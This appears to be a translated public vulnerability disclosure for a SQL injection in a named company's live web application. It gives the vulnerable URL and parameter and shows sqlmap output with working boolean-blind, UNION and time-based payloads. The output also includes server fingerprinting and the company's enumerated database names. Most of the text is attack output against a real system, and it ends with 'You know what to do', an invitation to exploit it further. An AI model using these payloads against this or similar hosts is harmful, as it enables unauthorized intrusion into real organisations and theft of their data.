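2014-01-07: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2014-02-21: The vendor has actively ignored the vulnerability; details are disclosed to the public.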
RT
Vulnerable URL: http://info.peaksport.com//UpdateLog/UpdateList.aspx?LogID=153
Threw it straight at SQLMAP:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: LogID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LogID=146 AND 7331=7331

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: LogID=-1347 UNION ALL SELECT 36,36,CHAR(113)+CHAR(120)+CHAR(110)+CHAR(121)+CHAR(113)+CHAR(81)+CHAR(100)+CHAR(66)+CHAR(73)+CHAR(85)+CHAR(107)+CHAR(66)+CHAR(121)+CHAR(70)+CHAR(81)+CHAR(113)+CHAR(102)+CHAR(103)+CHAR(107)+CHAR(113),36--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: LogID=-1678 OR 7864=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
[14:51:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:51:13] [INFO] fetching database names
[14:51:13] [INFO] the SQL query used returns 18 entries
[14:51:13] [INFO] resumed: "ASPState"
[14:51:13] [INFO] resumed: "distmodel"
[14:51:13] [INFO] resumed: "ITManage"
[14:51:13] [INFO] resumed: "linjin"
[14:51:13] [INFO] resumed: "master"
[14:51:13] [INFO] resumed: "model"
[14:51:13] [INFO] resumed: "msdb"
[14:51:13] [INFO] resumed: "NetXMS"
[14:51:13] [INFO] resumed: "PeakData"
[14:51:13] [INFO] resumed: "PeakData"
[14:51:13] [INFO] resumed: "PeakOA"
[14:51:13] [INFO] resumed: "ReportServer"
[14:51:13] [INFO] resumed: "ReportServerTempDB"
[14:51:13] [INFO] resumed: "RunLog"
[14:51:13] [INFO] resumed: "tempdb"
[14:51:13] [INFO] resumed: "Vip001"
[14:51:13] [INFO] resumed: "Vip001"
[14:51:13] [INFO] resumed: "ZWKQ"
available databases [16]:
[*] ASPState
[*] distmodel
[*] ITManage
[*] linjin
[*] master
[*] model
[*] msdb
[*] NetXMS
[*] PeakData
[*] PeakOA
[*] ReportServer
[*] ReportServerTempDB
[*] RunLog
[*] tempdb
[*] Vip001
[*] ZWKQ
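Too many tables; my eyes glazed over looking at them~~
Same as above
You know what to do
Unable to contact the vendor, or the vendor actively declined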